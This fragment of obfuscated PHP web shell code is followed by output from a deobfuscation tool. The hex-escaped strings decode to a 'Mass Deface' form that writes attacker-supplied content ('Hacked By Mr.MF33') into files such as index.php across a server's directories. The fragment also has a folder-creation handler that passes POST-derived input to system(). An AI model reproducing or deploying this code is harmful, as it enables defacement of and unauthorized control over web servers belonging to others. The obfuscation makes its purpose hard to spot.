"\74\164\145\170\x74\141\x72\x65\x61\x20\x63\x6c\141\x73\163\75\x27\146\157\162\155\55\x63\x6f\156\164\x72\x6f\154\47\x20\162\x6f\x77\163\x3d\x27\x38\47\40\x64\151\163\141\x62\x6c\145\144\75\47\x64\151\163\x61\x62\x6c\x65\144\x27\76"; if ($_POST["\x74\151\x70\145"] == "\155\141\x68\x61\154") { tipe_massal($_POST["\x64\137\x64\x69\x72"], $_POST["\144\137\x66\151\x6c\x65"], $_POST["\x73\143\162\151\x70\x74"]); } elseif ($_POST["\x74\x69\160\x65"] == "\x6d\x75\162\x61\150") { tipe_biasa($_POST["\144\x5f\144\x69\x72"], $_POST["\x64\137\x66\151\x6c\145"], $_POST["\x73\143\x72\151\x70\x74"]); } echo "\74\x2f\x74\145\170\x74\141\162\x65\x61\76\74\x61\40\x68\x72\145\146\75\47\77\144\151\162\x3d{$dir}\x27\x20\143\154\141\x73\163\75\47\142\x74\156\40\142\164\156\x2d\x69\156\x66\x6f\40\x62\x74\156\55\x62\x6c\x6f\x63\153\x20\155\164\x2d\x33\47\76\x4b\x65\x6d\142\x61\x6c\x69\74\x2f\x61\76"; } else { echo "\x3c\146\x6f\x72\155\40\155\x65\x74\150\157\x64\x3d\47\x70\157\163\x74\47\76\xa\11\x9\11\x9\x3c\143\145\156\164\145\x72\76\12\11\x9\11\x9\11\74\160\x3e\173\40\124\171\x70\x65\40\115\141\x73\163\40\x44\x65\x66\141\x63\145\40\x7d\74\57\160\76\xa\x9\11\x9\x9\x9\x3c\151\156\x70\x75\x74\x20\x69\144\75\47\164\x6f\x67\147\154\x65\x2d\157\x6e\x27\40\x63\154\141\163\163\x3d\x27\164\157\x67\x67\x6c\145\40\x74\157\x67\x67\x6c\145\x2d\x6c\145\146\164\x27\40\x6e\x61\x6d\x65\x3d\47\164\151\160\145\47\x20\166\141\x6c\x75\x65\75\47\155\x75\x72\x61\x68\x27\40\x74\171\160\145\x3d\x27\162\141\x64\151\157\x27\x20\143\x68\x65\143\x6b\145\144\x3e\xa\x9\11\11\11\11\x3c\154\x61\142\145\x6c\40\x66\x6f\x72\x3d\x27\x74\157\147\x67\x6c\145\55\x6f\x6e\x27\40\143\154\141\x73\163\75\47\x62\x75\164\x6e\47\76\102\x69\x61\163\x61\x3c\x2f\x6c\x61\x62\x65\x6c\76\12\x9\x9\11\x9\11\x3c\x69\x6e\x70\x75\164\x20\x69\144\75\x27\x74\157\147\147\x6c\145\x2d\157\146\x66\47\x20\x63\154\x61\x73\163\75\x27\x74\x6f\147\x67\154\145\40\x74\157\x67\x67\x6c\145\x2d\162\151\x67\x68\164\x27\40\156\141\155\145\75\x27\164\151\x70\145\x27\x20\x76\x61\x6c\165\145\75\x27\155\x61\150\141\x6c\x27\40\164\171\x70\x65\x3d\47\x72\x61\144\151\x6f\x27\x3e\12\x9\11\x9\11\11\x3c\x6c\x61\x62\145\154\x20\x66\157\162\x3d\x27\164\157\147\147\x6c\145\55\x6f\146\x66\47\40\143\x6c\x61\x73\x73\x3d\47\142\x75\x74\156\47\76\115\141\x73\x61\154\x3c\57\x6c\141\x62\x65\154\76\12\11\x9\x9\x9\74\x2f\x63\x65\156\164\x65\162\x3e\x3c\150\162\x3e\12\x9\11\x9\11\74\160\x3e\74\x69\40\x63\x6c\141\163\163\75\x27\146\141\x20\146\141\x2d\146\157\154\x64\145\x72\x27\76\x3c\57\x69\x3e\40\x4c\x6f\x6b\x61\x73\x69\74\57\x70\76\12\x9\x9\11\x9\x3c\x69\x6e\x70\165\x74\x20\164\171\x70\x65\75\47\164\x65\x78\x74\47\x20\156\x61\x6d\145\x3d\x27\x64\137\144\151\x72\x27\x20\166\x61\x6c\x75\145\75\x27{$dir}\x27\40\x63\x6c\x61\163\x73\x3d\47\x66\157\x72\155\55\x63\x6f\x6e\x74\x72\x6f\x6c\x27\76\x3c\142\162\76\12\x9\11\x9\x9\74\x70\76\74\151\40\143\x6c\x61\163\163\x20\x3d\x27\146\x61\x20\x66\x61\55\146\151\x6c\145\x27\x3e\x3c\57\x69\x3e\x20\116\x61\155\141\x20\x46\x69\x6c\x65\x3c\57\x70\76\12\x9\11\x9\x9\74\151\x6e\x70\165\x74\x20\164\171\x70\145\75\47\164\x65\170\x74\x27\40\156\141\x6d\145\75\47\144\x5f\146\151\x6c\x65\47\x20\x70\x6c\x61\143\x65\x68\x6f\154\144\145\x72\75\x27\x69\156\x64\x65\170\56\160\150\160\47\40\x63\x6c\x61\163\163\x3d\x27\x66\x6f\x72\155\55\x63\157\x6e\164\x72\157\154\x27\x3e\x3c\142\162\57\76\12\11\x9\x9\11\x3c\160\x3e\74\151\x20\143\x6c\x61\x73\x73\40\x3d\x27\x66\141\40\146\141\55\146\151\154\x65\47\x3e\74\57\x69\x3e\x20\111\x73\x69\x20\x46\x69\154\145\74\57\160\x3e\xa\x9\x9\11\11\x3c\164\x65\x78\x74\141\162\145\x61\x20\156\141\155\145\x3d\47\163\x63\x72\151\x70\164\47\x20\x63\x6c\x61\163\163\75\x27\146\157\x72\x6d\x2d\x63\157\156\164\x72\x6f\154\x27\x20\162\157\167\x73\75\x27\65\47\40\x70\154\x61\x63\x65\x68\x6f\x6c\x64\x65\x72\x3d\47\x48\141\x63\x6b\x65\x64\x20\x42\x79\x20\115\x72\x2e\x4d\106\63\63\47\x3e\x3c\x2f\164\145\x78\164\x61\162\x65\x61\76\x3c\x62\162\57\x3e\12\x9\11\x9\11\74\151\x6e\160\165\x74\40\x74\171\x70\145\75\x27\x73\x75\x62\155\x69\x74\47\x20\156\141\155\145\75\47\x73\x74\x61\162\x74\x27\40\166\x61\154\165\x65\75\47\x4d\x61\163\163\x20\x44\145\146\x61\x63\145\x27\40\x63\154\141\x73\163\x3d\47\x62\164\156\40\x62\x74\156\x2d\144\x61\x6e\147\145\x72\40\x66\157\162\x6d\x2d\x63\157\156\164\162\157\154\47\x3e\x3c\142\162\x2f\76\xa\11\x9\11\74\x2f\x66\x6f\162\x6d\x3e\x3c\142\162\76\74\142\162\76"; } } goto fDFDv; Ddh0j: if ($_GET["\x61\153\163\151"] == "\142\165\141\164\146\157\154\x64\145\162") { if (isset($_POST["\x66\157\x6c\x64\145\x72\x73\x73"])) { $folder = $_POST["\156\141\x6d\x61\106"]; $nama_folder = $path . "\57" . $folder; system(mkdir($nama_folder)); echo "\74\x73\143\x72\x69\160\x74\76\167\x69\x6e\x64\x6f\167\56\x6c\157\143\x61\164\x69\157\156\x3d\x27\x3f\x70\x61\164\150\75" . $path . "\47\73\40\141\154\x65\x72\164\x28\47\106\157\x6c\x64\x65\162\40\x53\165\153\163\x65\x73\x20\104\151\142\165\x61\164\x21\x27\x29\x3c\57\x73\143\x72\151\x70\164\76"; } echo "\xa\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\40\40\40\x20\74\146\x6f\x72\x6d\x20\155\x65\164\150\157\144\75\x22\x50\117\123\x54\x22\x3e\12\40\40\40\x20\40\x20\40\40\40\x20\40\40\40\x20\x20\x20\40\x20\x20\40\x3c\x6c\141\142\x65\154\40\146\x6f\x72\75\x22\x65\x78\141\155\x70\x6c\x65\x46\157\x72\155\x43\x6f\156\164\162\157\x6c\111\x6e\160\x75\x74\x31\42\x20\143\x6c\141\x73\x73\75\x22\x6c\x61\x62\145\x6c\40\146\157\162\x6d\55\x6c\x61\x62\145\154\42\76\116\x61\x6d\141\x20\x46\x6f\x6c\x64\x65\162\x20\72\74\57\x6c\x61\142\x65\x6c\x3e\xa\40\x20\x20\40\40\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\40\x20\40\74\144\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x22\x74\141\x6d\142\141\x68\144\x69\x72\x20\151\x6e\160\165\x74\55\x67\162\157\x75\x70\x20\155\x62\x2d\x33\42\76\12\40\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\40\40\40\x20\x20\74\x69\156\160\x75\164\x20\156\x61\x6d\145\x3d\x22\156\x61\155\141\106\42\40\x74\171\x70\145\x3d\42\164\145\170\x74\x22\x20\x63\x6c\141\x73\163\75\x22\146\x6f\162\x6d\x2d\x63\157\x6e\164\x72\x6f\154\42\40\160\x6c\x61\x63\145\150\x6f\154\144\x65\x72\x3d\x22\115\x61\x73\165\x6b\153\x61\x6e\x20\116\141\155\141\x20\106\x6f\154\x64\x65\162\42\40\141\162\151\141\55\144\145\163\x63\162\151\x62\145\144\142\171\x3d\x22\142\165\x74\x74\157\x6e\x2d\141\x64\x64\157\156\62\42\x3e\xa\x20\x20\x20\40\40\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x3c\x62\x75\164\x74\157\156\x20\x6e\x61\155\x65\x3d\42\146\x6f\x6c\x64\145\x72\163\163\42\40\143\x6c\141\163\163\x3d\42\x6b\154\x69\x6b\40\142\164\x6e\40\x62\164\x6e\x2d\x6f\x75\164\x6c\x69\x6e\145\x2d\163\x65\x63\x6f\156\144\141\x72\x79\x22\40\164\x79\x70\x65\75\x22\163\x75\x62\x6d\x69\164\42\40\x69\x64\x3d\x22\142\x75\x74\x74\x6f\156\x2d\141\x64\144\157\x6e\62\x22\x3e\103\x72\x65\x61\164\x65\40\x46\157\154\x64\x65\162\x3c\x2f\x62\x75\164\164\x6f\x6e\x3e\xa\40\x20\40\x20\40\x20\x20\x20\x20\40\40\40\40\x20\40\x20\40\40\x20\x20\x3c\57\144\x69\x76\x3e\40\40\12\40\40\40\40\x20\x20\40\40\x20\40\x20\40\40\40\x20\x20\74\x2f\146\157\x72\155\x3e"; } goto TsdEd; VBFow: ?>?> 

Function Calls

None

Variables

None

Stats

MD5 9845819a9fbfcdaa993e0e762ae6541d
Eval Count 0
Decode Time 118 ms